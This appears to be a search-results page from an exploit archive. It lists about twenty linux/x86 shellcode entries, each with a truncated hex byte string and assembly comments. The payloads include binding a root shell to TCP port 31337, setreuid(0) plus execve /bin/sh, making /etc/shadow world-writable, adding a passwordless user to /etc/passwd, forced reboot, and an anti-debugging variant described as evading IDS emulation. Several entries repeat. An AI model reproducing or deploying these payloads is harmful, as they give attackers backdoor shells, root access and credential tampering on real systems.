5626 matches found
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push...
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx...
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes. Shellcode exploit for linx86 platform / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes
linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes. Shellcode exploit for linx86 platform / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik / char shellcode = "\x6a\x0f" // push $0xf "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x66\xb9\xb6\x01" // mov $0x1b6,%cx...
linux/x86 getppid + execve/proc/pid/exe 51 bytes
linux/x86 getppid + execve/proc/pid/exe 51 bytes. Shellcode exploit for linx86 platform / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // : // "\x4c" // dec %esp "\x99" // clt...
linux/x86 reboot - 20 bytes
linux/x86 reboot - 20 bytes. Shellcode exploit for linx86 platform / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" /...
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes. Shellcode exploit for linx86 platform / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx...
linux/x86 execve/bin/sh / PUSH - 23 bytes
linux/x86 execve/bin/sh / PUSH - 23 bytes. Shellcode exploit for linx86 platform / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f...
linux/x86 cat /dev/urandom > /dev/console 63 bytes
linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes. Shellcode exploit for linx86 platform / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 // /...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
No description provided by source. / linux/x86 adds user 'xtz' without password to /etc/passwd - 59 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 // // exit: // "\x58" // pop %eax "\x99" // cltd "\x31\xc9" // xor %ecx,%ecx "\x66\xb9\x01\x04" // mov $0x401,%cx "\x52" // pu...
linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
No description provided by source. / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // push...
linux/x86 quick (yet conditional eax != 0 and edx == 0) exit 4 bytes
No description provided by source. / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik [email protected] / char shellcode = "\xf7\xf0" // div %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-...
linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes
No description provided by source. / linux/x86 getppid + execve"/proc/pid/exe", "/proc/pid/exe", NULL - 51 bytes - izik [email protected] / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // convert: // "\x4c" // dec %esp "\x99" // cltd "\x6a\x0a" // push $0xa...
linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes
No description provided by source. / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // pus...
linux/x86 cat /dev/urandom > /dev/console just for kicks - 63 bytes
No description provided by source. / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik [email protected] / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e "\x68\x2f\x75\x72\x61" // push $0x6172752f...
linux/x86 reboot() - 20 bytes
No description provided by source. / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik [email protected] / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" // mov...
linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes
No description provided by source. / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS would try to x86-emulate the shellcode it would glitch and fail. This...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
Exploit for linux/x86 platform in category shellcode ============================================ linux/x86 Bind /bin/sh to 31337/tcp 80 bytes ============================================ / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...